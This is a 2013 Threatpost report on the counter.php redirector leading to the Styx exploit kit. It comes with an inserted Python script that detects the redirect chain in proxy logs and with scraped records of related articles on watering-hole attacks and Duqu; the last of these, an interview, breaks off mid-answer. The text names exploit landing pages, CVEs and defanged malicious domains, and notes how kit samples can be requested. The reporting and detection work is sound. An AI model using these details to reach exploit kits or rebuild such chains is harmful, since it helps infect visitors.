The Counter.php strain of malware has been spotted in the past redirecting users to a handful of malicious sites and now appears to be leveraging that ability to send victims to websites serving up the Styx exploit kit.
According to [a post on Securelist today](<http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php#page_top>), Vicente Diaz, a researcher with Kaspersky Lab, discovered counter.php while looking into some of the more popular Web attacks in Spain during the past three months. One bit of code in particular, Trojan.JS.iframe.aeq, jumped out at him.
At the end of that source code was counter.php, a malicious redirector that uses an iframe and first began popping up in Japan and Spain in [February and March](<http://michajp.blogspot.jp/2013/03/malicious-counterphp.html>) of this year.
Counter.php in turn led Diaz to stumble upon a site passing out the Styx exploit kit, a pricey $3,000 toolkit that enjoyed its peak of popularity earlier this spring.
Thanks to a relatively new botnet named [Fort Disco](<http://threatpost.com/fort-disco-brute-force-attack-campaign-targets-cms-websites/101723>), researchers found a PHP redirector earlier this month that also sent victims to sites hosting Styx, suggesting the malicious sites in both situations are one and the same.
According to Diaz the exploit kit runs a script function called PluginDetect to profile the victim and determine which version of Java the user is running. It then exploits one of a handful of – mostly Java – vulnerabilities:
* “jorg.html” CVE-2013-0422
* “jlnp.html” CVE-2013-2423
* “pdfx.html” loads “fnts.html” CVE-2011-3402
* “jovf.html” CVE-2013-1493
* and downloads a .pdf file CVE-2010-0188
Diaz goes on to describe how the sites passing out Styx may have gotten infected, suggesting their FTP accounts may have been compromised. After contacting the sites’ corresponding hosting companies though, Diaz was able to glean a little more about the most recent iteration of counter.php.
Looking at the functions and strings, “when users are redirected to counter.php, then there is a second redirection to stat.php,” a filter that helps the kit avoid reinfections and avoid signature detection.
“As stat.php does not check that the parameter IP is the remote address, now we know how to create requests for getting samples from the exploit kit,” Diaz said.
As if all this weren’t enough, the kit goes on to install a dropper that downloads a fake antivirus or the ZeroAccess Trojan to the infected machine, according to the blog post. Further analysis of that malware is forthcoming, but for Diaz’s in-depth account of Counter.php and how he found the Styx kits, head [here](<http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php#page_top>).
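
The redirect chain described above (counter.php, then stat.php, then one of the named landing pages) can be turned into a proxy-log check that also reports which CVE patches to verify on the affected client. This Python code is an added example, not code from Diaz, Kaspersky Lab or Threatpost; the log format, host names, addresses and the 60-second window are constructed assumptions, while the file names and CVE numbers are the ones listed in the article.

```python
from urllib.parse import urlsplit

# Landing-page file names and the CVE each was reported to exploit (from the article).
LANDING_PAGES = {
    "jorg.html": "CVE-2013-0422",
    "jlnp.html": "CVE-2013-2423",
    "pdfx.html": "CVE-2011-3402",
    "fnts.html": "CVE-2011-3402",
    "jovf.html": "CVE-2013-1493",
}
PDF_CVE = "CVE-2010-0188"  # the article's ".pdf file" case

# Constructed sample proxy log (assumed format): epoch client method url status
SAMPLE_LOG = """\
1376300000 192.0.2.10 GET http://blog.example/index.html 200
1376300001 192.0.2.10 GET http://redir.example/counter.php 302
1376300002 192.0.2.10 GET http://redir.example/stat.php 302
1376300003 192.0.2.10 GET http://kit.example/a/jorg.html 200
1376300005 192.0.2.10 GET http://kit.example/a/pdfx.html 200
1376300006 192.0.2.10 GET http://kit.example/a/fnts.html 200
1376300100 192.0.2.11 GET http://redir.example/counter.php 302
1376300101 192.0.2.11 GET http://redir.example/stat.php 302
1376300102 192.0.2.11 GET http://news.example/ 200
1376300200 192.0.2.12 GET http://shop.example/counter.php 200
1376300900 192.0.2.12 GET http://docs.example/jovf.html 200
1376300950 198.51.100.7 GET http://intranet.example/jlnp.html 200
malformed line here
"""


def parse_line(line):
    """Return (ts, client, host, file_name), or None for a malformed line."""
    parts = line.split()
    if len(parts) != 5 or not parts[0].isdigit():
        return None
    url = urlsplit(parts[3])
    name = url.path.rsplit("/", 1)[-1].lower()
    return int(parts[0]), parts[1], url.hostname or "", name


def detect_chains(lines, window=60):
    """Report clients that hit counter.php and then stat.php within `window` seconds.

    stage 2 = redirected through both scripts, no landing page seen
    stage 3 = a known landing page (or a .pdf) was fetched after the redirects
    A lone counter.php hit or a lone landing-page name is not reported: both
    file names are common on benign sites, so only the ordered chain counts.
    """
    open_chains, findings = {}, []

    def close(client):
        chain = open_chains.pop(client, None)
        if chain and chain["stage"] >= 2:
            chain["cves"] = sorted(chain["cves"])
            del chain["last_ts"]
            findings.append(chain)

    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e[0])
    for ts, client, host, name in events:
        chain = open_chains.get(client)
        if chain and ts - chain["last_ts"] > window:
            close(client)  # chain went stale before completing
            chain = None
        if name == "counter.php":
            close(client)  # a new redirect starts a new chain
            chain = open_chains[client] = {
                "client": client, "stage": 1, "last_ts": ts,
                "hosts": [], "cves": set(),
            }
        elif chain is None:
            continue
        elif name == "stat.php":
            chain["stage"] = max(chain["stage"], 2)
        elif chain["stage"] >= 2 and name in LANDING_PAGES:
            chain["stage"] = 3
            chain["cves"].add(LANDING_PAGES[name])
        elif chain["stage"] >= 2 and name.endswith(".pdf"):
            chain["stage"] = 3  # lower confidence: any PDF fetched after the redirects
            chain["cves"].add(PDF_CVE)
        else:
            continue  # unrelated request, does not extend the chain
        chain["last_ts"] = ts
        if host not in chain["hosts"]:
            chain["hosts"].append(host)
    for client in list(open_chains):
        close(client)
    return findings


if __name__ == "__main__":
    for f in detect_chains(SAMPLE_LOG.splitlines()):
        print(f["client"], "stage", f["stage"], f["hosts"], f["cves"] or "-")
```

A stage 2 finding with no landing page is still worth triage: the client reached the redirector, and the stat.php filter may simply have declined to serve it.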
{"id": "THREATPOST:EE3F3A8389237EB34791DBD9A0F1066E", "type": "threatpost", "bulletinFamily": "info", "title": "Counter.php Redirecting to Sites Peddling Styx Exploit Kit", "published": "2013-08-12T14:52:37", "modified": "2013-08-12T18:52:37", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://threatpost.com/counter-php-found-redirecting-to-sites-peddling-styx-exploit-kit/101967/", "reporter": "Chris Brook", "cvelist": ["CVE-2010-0188", "CVE-2011-3402", "CVE-2013-0422", "CVE-2013-1493", "CVE-2013-2423"]}
{"threatpost": [{"lastseen": "2018-10-06T23:00:36", "description": "As many as 65 websites have been compromised in an attack that has snared another Washington, D.C.-area media website as well as a number of travel and leisure sites.\n\nWhile the sites aren\u2019t topically related, they\u2019re all hosting advertisements injected with malicious code hosted on googlecodehosting[.]com, googlecodehosting[.]org and googlecodehosting[.]net, all of which resolve to the same IP address, security company Zscaler said. The IP is currently offline.\n\nThe ads were delivered by openxadvertising[.]com, which Google SafeBrowsing is blocking, Zscaler said. The attacks are exploiting two Java vulnerabilities [CVE-2013-1493](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493>) and [CVE-2013-2423](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2423>), both of which are being used to drop [the ZeroAccess Trojan](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/>) on affected machines, Zscaler said.\n\nZeroAccess is financial malware that deals in click-fraud, Bitcoin theft and includes rootkit capabilities that help it avoid detection from security software. It\u2019s spread primarily through a number of botnets, including [peer-to-peer botnets](<http://threatpost.com/peer-to-peer-botnets-resilient-to-takedown-attempts/>).\n\nGovernment Security News reported this week that its site had been compromised and that Google was warning visitors of malware on the site. GSN covers government-related IT and physical security issues.\n\n\u201cAt first, _GSN_ thought we were a random victim of a cyber-attack with no specific target. Alternatively, we thought we might have been a specific target of what is sometimes called a \u201cspear-fishing attack,\u201d aimed at a single company or organization,\u201d a post on the website said. 
\u201cBut during the course of Monday, June 17, we learned from a respected malware detection company that its cyber-attack technical experts had encountered the same attack several times in recent days, each aimed at a different media company. One attack was aimed at a radio station in Washington, DC; another was targeted at a public affairs-oriented news organization.\u201d\n\nRadio station WTOP and Federal News Radio, in addition to the Free Beacon website, have been compromised in attacks starting in early May. All of the attacks are similar in that malicious javascript is injected onto the site that redirects visitors to sites hosting more malware.\n\nGSN said its site was clean by late Monday.\n\nZscaler said the previous attacks on media sites were hosted at dynamic DNS providers and the attacks are triggered only when it detects the user is visiting via Internet Explorer. Zscaler also identified three other media sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.\n\nThe attacks were tagged watering hole attacks by experts; in watering hole attacks, sites of common interest to the target are infected and visitors are redirected to malware. 
Some watering hole attacks against government websites or human rights organizations have led to malware that monitors a user\u2019s activities online, while other attacks are financially motivated.\n", "cvss3": {}, "published": "2013-06-19T16:05:05", "type": "threatpost", "title": "65 Sites Compromised in ZeroAccess Trojan Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-1493", "CVE-2013-2423"], "modified": "2013-06-19T20:05:05", "id": "THREATPOST:77484EF7D9FBC087726C972CAA2EAD32", "href": "https://threatpost.com/malicious-ads-infect-65-websites-drop-zeroaccess-trojan/101028/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:49", "description": "Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks with criminals using a watering-hole tactic to spread scareware, or phony antivirus software.\n\nPopular D.C. radio station WTOP, sister station Federal News Radio, and the site of technology blogger John Dvorak, were infected with exploits targeting third-party Java or Adobe browser plug-ins. The exploits redirect site visitors to an exploit kit serving a scareware executable known as Amsecure.\n\nAs of Tuesday morning, WTOP was still serving malware. The source of the attacks on WTOP and Federal News Radio has not been determined, and it still could be that these are a jumping off point for a larger attack against Federal employees who frequent those sites as a D.C. news source. Media sites have been targeted with more frequency in recent months, and on a variety of levels. 
But for now, experts are not calling these targeted attacks.\n\n\u201cTypically with \u2018watering hole\u2019 style attacks, the threat actors are targeting a very specific group of users or organizations in order to implant malware (remote access Trojan) that allows for access to the victim\u2019s network (as we saw with the recent DoL compromise),\u201d said [Invincea](<http://www.invincea.com/2013/05/k-i-a-wtop-com-fednewsradio-and-dvorak-blog-site-serving-malware-media-sites-compromised-to-push-fake-av/>) in a statement provided to Threatpost. \u201cIn the case of these three sites which are obviously visited by a much larger audience and based on the type of malware observed (crimeware vs. RAT) our assumption is that a specific user group is more than likely not being targeted. Theft of online credentials and/or loss of additional PII is the likely goal of the attacker in these cases.\u201d\n\nZscaler, meanwhile, said [the three attacks shared another commonality](<http://research.zscaler.com/2013/05/popular-media-sites-involved-in-mass.html>): the attack sites were hosted at dynamic DNS providers and the attacks are triggered only when it detects the user is visiting via Internet Explorer. Zscaler also identified three media other sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.\n\nThe Dvorak site, meanwhile, may be offering up more clues on the attack than the other two. Invincea said it visited the site using Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. 
An admin for the Dvorak site posted a note that malware had been discovered in the site\u2019s wp-config.php file, which is the main configuration file for the WordPress content management system.\n\n\u201cGiven the amount of attention WordPress has received both recently and historically by miscreants seeking to hijack legitimate websites in order to drive user traffic to malware landing pages, this came as no surprise to us,\u201d Invincea security engineer Eddie Mitchell said.\n\nUpon landing on the Dvorak site, IE pulls a Java application from the attacker\u2019s site and connects to one of two malicious domains, registered to a Russian domain. The Amsecure malware is downloaded and a desktop shortcut is installed, called Internet Security 2013[.]ink.\n\nAmsecure is part of the Kazy malware family. Previous variants of the malware take over the desktop and display a warning screen indicating the computer has been infected along with a phony scanner tool that the attacker hopes will scare the user into buying the fake antivirus program.\n\nInvincea was also able to discover three exploits on the Dvorak landing page for Java and Adobe Reader: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. 
These exploits lead to landing page hosting the Black Hole exploit kit and the amsecure attacks.\n", "cvss3": {}, "published": "2013-05-07T12:58:12", "type": "threatpost", "title": "Hacked Media Sites Serving Fake AV Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "modified": "2013-05-09T20:01:56", "id": "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "href": "https://threatpost.com/d-c-media-sites-hacked-serving-fake-av/100268/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:40", "description": "**Update:** _Aaron Harison, president of the Center for American Freedom, told Threatpost this morning that the issue has been resolved and the site is no longer serving malware. _** **\n\nHackers have latched on to the NSA surveillance story\u2014literally.\n\nA news story on the outing of whistleblower Edward Snowden posted to the Washington Free Beacon is serving malware redirecting visitors to a malicious site where more malware awaits. The Free Beacon site remains infected, according to Invincea researchers, who said they have contacted the news organization about the attack. The story is being linked to by the popular Drudge Report and it\u2019s likely to have snared a pretty good number of victims so far.\n\nThe attack on the Free Beacon is similar to a previous [watering hole attack carried out against a number of other Washington, D.C.-based media outlets](<http://threatpost.com/d-c-media-sites-hacked-serving-fake-av/>), including radio station WTOP, Federal News Radio and the site of technology blogger John Dvorak. Invincea researcher Eddie Mitchell wrote on the company\u2019s blog that several other Free Beacon pages are also serving javascript, including the site\u2019s main index page. 
The JavaScript drops an iframe that sends traffic offsite to a page hosting the Fiesta Exploit Kit.\n\n\u201cThis exploit appears to be the same as used against other media sites to infect readers of these websites and part of a concerted campaign against media sites to infect their visitors by exploiting vulnerabilities in Java,\u201d Mitchell wrote.\n\nMitchell cautions that this attack isn\u2019t being detected yet by security companies because signatures associated with the attack are different from previous campaigns.\n\nThe Free Beacon attack is infecting users with the [ZeroAccess rootkit](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/>), as well as scareware. ZeroAccess is a virulent [peer-to-peer botnet](<http://threatpost.com/number-of-peer-to-peer-botnets-grows-5x/>) that has been folded into a number of commercial exploit kits including Blackhole. The malware makes outbound communication requests to a number of command and control servers including e-zeeinternet[.]com, cinnamyn[.]com and twinkcam[.]net, from where the additional malware is loaded onto victim machines.\n\nA little more than a month ago, the campaigns against WTOP and sister station Federal News Radio were discovered. The exploits targeted Java and Adobe plug-ins and were used to spread scareware. Content on both stations is heavily political and the attacks could have been a jumping off point for a larger attack against federal employees who use the site as a resource. Unlike other watering hole attacks that lead to espionage campaigns against activists or political leaders, this one was serving malware usually associated with cybercrime.\n\nThe Dvorak site was also attacked a month ago and malware was discovered on the site\u2019s [WordPress configuration files](<http://threatpost.com/hackers-using-brute-force-attacks-harvest-wordpress-sites-041513/>). 
Invincea said at the time that it used Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. The browser was pulling a Java app from the attacker\u2019s site and connecting to one of two Russian domains to download Amsecure malware, part of the Kazy malware family, which is known for ransomware and scareware attacks. Three Java and Reader exploits were discovered on the Dvorak site: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to a landing page hosting the Black Hole exploit kit and the Amsecure attacks.\n", "cvss3": {}, "published": "2013-06-10T16:17:14", "type": "threatpost", "title": "Free Beacon Article Redirects to ZeroAccess Rootkit, Fake AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "modified": "2013-06-12T16:59:18", "id": "THREATPOST:988117842525F1F414002817E6166A11", "href": "https://threatpost.com/nsa-whistleblower-article-redirects-to-malware/100930/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:45", "description": "Lady Boyle seems to have an admirer.\n\nMalware named after a character in the Dishonored video game continues to pop up in targeted attacks against a number of high profile military and socially motivated websites. The latest surfaced about 10 days ago in an attack researchers at FireEye are calling the Sunshop Campaign.\n\nSunshop targeted a number of Korean military and political strategy websites, as well as a Uyghur forum among others with a pair of Java exploits and the recently [patched IE 8 vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms13-038>) used against the U.S. Department of Labor and a number of other sites. 
The exploits were redirecting vulnerable visitors to sunshop[.]com[.]tw where a host of malware awaits including Lady Boyle, which has been deployed in other [attacks against the Uyghur](<https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&ved=0CFcQFjAF&url=http%3A%2F%2Fthreatpost.com%2Fmalware-arsenal-targets-tibetan-activists-040213%2F&ei=V7ybUZhgq7PRAdzagfAD&usg=AFQjCNGKZ8xrkJiBv_H9dqZlQdevNV6PgQ&sig2=E2KLpJnzNz4LttVm7aPl_A&bvm=bv.46865395,d.dmQ>), in particular, and in the [Winnti attacks](<http://threatpost.com/stolen-winnti-certificates-used-watering-hole-attack-against-tibet-orphans-site-041213/>).\n\n\u201cA number of different Chinese-based espionage threat attackers use that malware, so it\u2019s hard to use that indicator alone to tie it to one particular threat actor,\u201d said Ned Moran, a researcher at FireEye. \u201cAt least 5 different groups are using that malware. It\u2019s a popular tool used by intrusion actors.\n\n\u201cBased on the sites compromised, there was a clear focus on Korean security and defense related issues,\u201d Moran said. \u201cThe attackers are looking for data around the Korean defense posture.\u201d\n\nThe group behind Sunshop was also behind a 2010 attack on the Nobel Prize website that took advantage of a zero-day in Firefox, FireEye said.\n\nThese attacks can be considered watering hole attacks since all the sites are popular with influential targets and have JavaScript exploits that redirect victims to espionage-type malware.\n\n\u201cThese sites are well trafficked and the attackers have a strong sense of the audiences of these sites,\u201d Moran said. \u201cThey compromise the sites and wait for traffic to come to them.\u201d\n\nThe Lady Boyle malware, which is a remote access Trojan, is being served from three different command and control servers in the Sunshop attacks. 
IE8 users who land on the compromised site are hit with an exploit for [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>) pulled in from hk[.]sz181[.]com connected to a C&C server at dns[.]homesvr[.]tk. The two Java exploits, meanwhile, exploit [CVE-2013-2423](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2423>) and [CVE-2013-1493](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493>), both of which have been patched. All of the command and control servers, FireEye said, resolved to 58[.]64[.]205[.]53, used by another domain used to drop Briba malware, also known as the [IExplore RAT](<https://citizenlab.org/wp-content/uploads/2012/09/IEXPL0RE_RAT.pdf>) targeting NGOs.\n\n\u201cThis is a traditional RAT type of malware that provides access to a machine, runs commands, downloads victim data or uploads new executables to the victim, or runs shell commands,\u201d Moran said. \u201cIn our experience, we have not seen it used outside this small set of intrusion actors; it\u2019s not commercially available. 
Whenever we see it, it tends to show up in these types of attacks, strategic espionage attacks.\u201d\n\nFireEye researchers also discovered a connection between the Sunshop[.]com[.]tw host and the PoisonIvy RAT used in a number of other targeted attacks.\n\n\u201cThat was the first time [Sunshop] was used as an exploit server; it\u2019s been in play for a few months,\u201d Moran said.\n", "cvss3": {}, "published": "2013-05-21T14:40:44", "type": "threatpost", "title": "IE 8 0Day in Sunshop Targeted Espionage Malware Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-1347", "CVE-2013-1493", "CVE-2013-2423"], "modified": "2013-05-23T18:36:13", "id": "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", "href": "https://threatpost.com/ie-8-zero-day-pops-up-in-targeted-attacks-against-korean-military-sites/100728/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:30", "description": "Font-parsing vulnerabilities weren\u2019t part of the security consciousness much until the discovery of [Duqu](<http://threatpost.com/mystery-duqu-102011>) at the end of 2011. The spy malware hooked into the Windows kernel through bugs in the TrueType font file parsing engine, and not only breathed new life into the concept of cyber espionage, but helped rejuvenate an interest in kernel-level vulnerabilities and exploits.\n\nAlready this year, there have been successful [sandbox bypasses leading to kernel compromises](<http://threatpost.com/using-kernel-exploits-bypass-sandboxes-fun-and-profit-031813/>) demonstrated at Pwn2Own and Black Hat EU. And every single Patch Tuesday release from Microsoft going back to last October has included patches for kernel bugs, including some being actively exploited in the wild. 
[The July Patch Tuesday updates](<http://threatpost.com/critical-truetype-font-parsing-vulnerabilities-addressed-in-patch-tuesday-updates/101232>) released this week were particularly noteworthy with three separate bulletins addressing vulnerabilities in seven different Microsoft products affected by the same [TrueType font flaw](<http://www.securelist.com/en/blog/9102/Microsoft_Updates_July_2013_Serious_flaws_in_IE_DirectShow_and_Multiple_TrueType_Font_Handling_Code_Paths>).\n\nThis dynamic seems to bust the myth that attackers are solely interested in Web-based vulnerabilities and attacks against Java or Adobe bugs. Kernel attacks may be difficult, but they deliver hackers what they covet most: root access to computers, complete system compromises, and the ability to remotely inject code on a whim. And let\u2019s not forget that kernel-based attacks are starting to go mainstream, given the fact that [the Duqu exploit has been folded into the Blackhole and Cool exploit kits](<http://malware.dontneedcoffee.com/2012/10/newcoolek.html>), even though most of these vulnerabilities, the [Duqu vulnerability](<http://threatpost.com/microsoft-patches-windows-flaw-exploited-duqu-121311/$post_id%25/>) included, have been patched.\n\nWhite hats\u2014and criminals\u2014have been paying particularly close attention to the TrueType font file exploits. Attacks like these are executed via an embedded malicious font file dropped into an Office document, such as a Word file. Once the user opens the malicious file\u2014delivered either via a spear phishing email or over the Web\u2014the exploit targets a [vulnerability in kernel-mode drivers that improperly handle malicious TrueType font files](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3402>).\n\n\u201cTrueType font parsing is complicated and often maintains nested code. 
Its handling exercises code paths that expose both user-land and kernel mode vulnerabilities,\u201d said Kurt Baumgartner, principal security researcher at Kaspersky Lab. \u201cOn the Windows platform, much of the same code is maintained across versions of the OS. So the same vulnerability can be exploited across every version of the platform, although the exploit may need to be somewhat adapted to each OS version.\u201d\n\nThree July Patch Tuesday bulletins\u2014[MS13-052](<https://technet.microsoft.com/en-us/security/bulletin/ms13-052>), [MS13-053](<https://technet.microsoft.com/en-us/security/bulletin/ms13-053>) and [MS13-054](<https://technet.microsoft.com/en-us/security/bulletin/ms13-054>)\u2014illustrate this point. Vulnerabilities in Microsoft Office, Lync, Visual Studio, .NET, Silverlight, and Windows components such as GDI+ were patched in relation to the TrueType flaw.\n\n\u201cTrueType vulnerabilities are difficult to exploit. But once they are, the exploits themselves can be reliable and difficult for antimalware solutions to handle,\u201d Baumgartner said. \u201cEven though the code abused by a TrueType exploit resides in the kernel, this portion of the kernel is different from and much less active than trying to deliver bits to highly active code handling network traffic, for example.\u201d\n\nThe fact that Microsoft has been patching kernel bugs with greater frequency could indicate a spike in hacker interest; TrueType- and OpenType-based attacks are particularly attractive because they don\u2019t require user permission to interact with the core of the OS.\n\n\u201cRegarding TrueType Font (TTF) based attacks, it is important to note that not all TTF processing takes place in kernel-space. 
Depending on what vector is used to provide a crafted TTF, an attacker may get SYSTEM access or may just get access in the context of the affected process,\u201d said Craig Young, security researcher at Tripwire.\n\nAn exploit against the GDI+ vulnerability patched this week in MS13-054, Young said, would provide such kernel-space compromise of the system. Others, however, expose only the user-mode font processing and would not lead to complete system compromise.\n\n\u201cTrueType and OpenType font based attacks are definitely part of the mainstream attacker toolkit. These types of font files contain tables of data describing the curves as well as instructions which must be interpreted when rendering text,\u201d Young said. \u201cThis complexity makes it possible to have nice looking typesets but it also makes fonts very attractive to attackers due to the large attack surface and kernel involvement.\u201d\n\n\u201cCreating an exploit capable of reliable code execution on a modern operating system is always difficult but researchers and attackers have certainly had great success in doing so with various crafted fonts,\u201d Young added. \u201cOnce the crafted font has been developed, it is very easy to compromise victims by getting them to visit a web site or open a document. This technique can be quite effective as fonts are commonly rendered without asking user permission. It is a vector which lends itself very well to the spear-phishing and watering-hole techniques employed by APT as well as organized crime syndicates.\u201d\n\nIt\u2019s certainly true for white hats; Rahul Kashyap, chief security architect at virtualization security company Bromium told Threatpost in March that he and fellow researcher Rafal Wojtczuk followed Duqu\u2019s lead in exploiting TrueType vulnerabilities to access and own the kernel. 
They demonstrated at Black Hat EU how to use a commercial Windows-based sandbox called Sandboxie, which interfaces with the kernel in order for arbitrary code to run properly, to pull off a system compromise. With fonts, for example, Kashyap said a kernel call has to be made from the sandbox to the kernel; the sandbox has to allow the call to pass in order for, in this case, the font to render properly.\n\n\u201cDuqu exploited this vulnerability in font parsing to compromise the host. All of these kernel interfaces are bypassable by Duqu,\u201d Kashyap said. \u201cUsing several exploits for bugs in the way calls are handled by the kernel, it was easy to get a blue screen.\u201d\n\nThe trick is in the fact that the sandbox doesn\u2019t intercept font parsing calls to the kernel for performance reasons and the fonts would not be processed properly, he said.\n\n\u201cThere is a lot of exposure from the OS kernel that people don\u2019t realize,\u201d he said. \u201cThe moment you compromise the kernel, you have the same privileges as the kernel. You can disable the sandbox, access other programs and data and breach everything out there. With most Java exploits, for example, you still have to do privilege escalation. 
With the kernel, this is the worst-case scenario.\u201d\n", "cvss3": {}, "published": "2013-07-11T14:10:56", "type": "threatpost", "title": "TrueType Font Exploits Gateway to Kernel Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2013-07-15T20:14:36", "id": "THREATPOST:770B6E17E4B8181D31E215933E54652B", "href": "https://threatpost.com/of-truetype-font-vulnerabilities-and-the-windows-kernel/101263/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:21", "description": "[Stuxnet](<https://threatpost.com/stuxnet-authors-made-several-basic-errors-011811/>) has become the bogeyman of Internet security and cyberwar, showing up in marketing pitches, PowerPoint presentations and press releases from Washington to Silicon Valley to Tehran. But while Stuxnet has been garnering headlines for more than a year now, the far more serious threat in terms of potential long-term damage has turned out to be [Duqu](<https://threatpost.com/anatomy-duqu-attacks-112111/>). The malware first came to light in September, but it may have been circulating four or five months before that. Its customizable, modular architecture has been a challenge for researchers seeking to understand its operation and its creators\u2019 intentions. Threatpost editor Dennis Fisher spoke with Costin Raiu, one of the main researchers working on Duqu at Kaspersky Lab, about the relationship between Stuxnet and Duqu, the possible identity of the attackers and the investigation into its architecture.\n\n**Dennis Fisher**: So, let\u2019s try and start at the beginning here. Duqu first sort of popped up a few weeks ago. How exactly was it found? And how did it initially start getting connected to Stuxnet? \n****\n\n**Costin Raiu**: Right. Okay, so, to be honest, the first reports of Duqu came up in September actually, not October. And we heard about it in a very interesting way. 
A colleague working for another company sent us a binary, and we searched for the MD5 of that binary on the Internet. So, we found a very interesting weblog page which was apparently maintained by a Hungarian researcher. And he was saying something like, \u201cLooking for friends or foes of this specific MD5 to talk about it.\u201d So, we thought it was very curious, very interesting. We looked at the binary. And the binary itself was interesting. First of all, there was, like, no Internet connection whatsoever. So, the only thing which the binary was doing when called with a special parameter called XXX. So, if you have executed this binary without putting the XXX parameter, then nothing happens. But, if you invoke it with this specific marker, then interesting things happen such as intercepting keystrokes, taking captures of the screen, dumping the configuration of your computer. And all this basically happens in background.\n\nAnd also, data is written to a file in your temporary folder. And this file, first of all, it is compressed. And it collects all this information. So, basically, it grows bigger and bigger and bigger. And this file has a very interesting name which is the tilde character and then DQ and then a number dot TMP.\n\nSo, basically, we observed this specific Trojan, which we received back in September, it was collecting all sorts of information from your system and dumping it into this file, but not sending it anywhere. So, that was very, very interesting. Why would anybody write a Trojan which steals information but doesn\u2019t send it anywhere? \n****\n\n**Dennis Fisher**: Right? \n****\n\n**Costin Raiu**: So, that seemed very odd to us. And to be honest, we didn\u2019t think it was really important or anything special simply because it didn\u2019t seem to do anything malicious except collect information about your system in a local file. 
\n****\n\n**Dennis Fisher**: And so, after that, a deeper analysis sort of uncovered the fact that that was only one component of the malware, right? \n****\n\n**Costin Raiu**: Right. So, later \u2013 basically, one month later, there was a public news about the Duqu and the fact that there were multiple components. And the file which we received in September was just one of the modules of this sophisticated hacking toolkit. So, then you understand that the way Duqu was written is to make it very hard to detect. Every single component by itself could be meaningless. But when you put them together, basically, interesting things start to happen.\n\nSo, this Trojan, the info stealer \u2013 the so-called \u201cinfo stealer\u201d component \u2013 which collects information from your system, does not get installed in the initial attack. So, you get infected with Duqu, and this only happens through a targeted attack. So \u2013 and by the way, I think it\u2019s very important to point out that if you got infected with Duqu, and if you\u2019re listening to us right now, then the first thing that you should know that you\u2019re probably part of a very, very limited number of people in the world. You\u2019re part of an elite, so to say, which had the privilege and the \u2013 okay \u2013 bad luck of getting infected with this sophisticated cyber espionage tool. \n****\n\n**Dennis Fisher**: So, you should feel special. \n****\n\n**Costin Raiu**: Absolutely. Actually, we pretty much think that every single victim of Duqu is special from a specific point of view, which we cannot disclose for obvious reasons. \n****\n\n**Dennis Fisher**: Yeah. \n****\n\n**Costin Raiu**: But I hope that, actually, we will be able to tell it at some point in time. And basically, when you get infected with Duqu, it\u2019s simple, let\u2019s say, the basic infrastructure. 
And then it connects to a command-and-control center which is hardcoded into its configuration files, and it begins \u2013 it starts to receive new modules like the info stealer. And the info stealer, as I was saying, it doesn\u2019t do many suspicious things except, okay, intercepting keyboard or, like, making screenshots. But, the file is stored to disk. So, the other, let\u2019s say, components, basically, the Duqu infrastructure is responsible for transferring the file from your disk to the command-and-control center and from there to the attacker.\n\nAnd I guess, it\u2019s also important to point out that, due to the way the Duqu, let\u2019s say, infrastructure has been designed, they created it in such a way that they leave as little footprints, fingerprints, as possible. So, dynamic process injection, no temporary files, no \u2013 especially for executables and modules no temporary files are created. So, they get the module from the command-and-control, and they inject it directly into another process without creating any temporary files, and they launch the code there. So, very, very careful, I think, they\u2019re very careful to make sure that these parts, these modules of Duqu, do not get left behind and they do not get discovered. \n****\n\n**Dennis Fisher**: Okay. It appears that they\u2019re using not only a different command-and-control for just about every attack, but they\u2019re creating separate drivers and different files for each target that they\u2019re going after. Is that the way it\u2019s working? \n****\n\n**Costin Raiu**: Yes. And this is 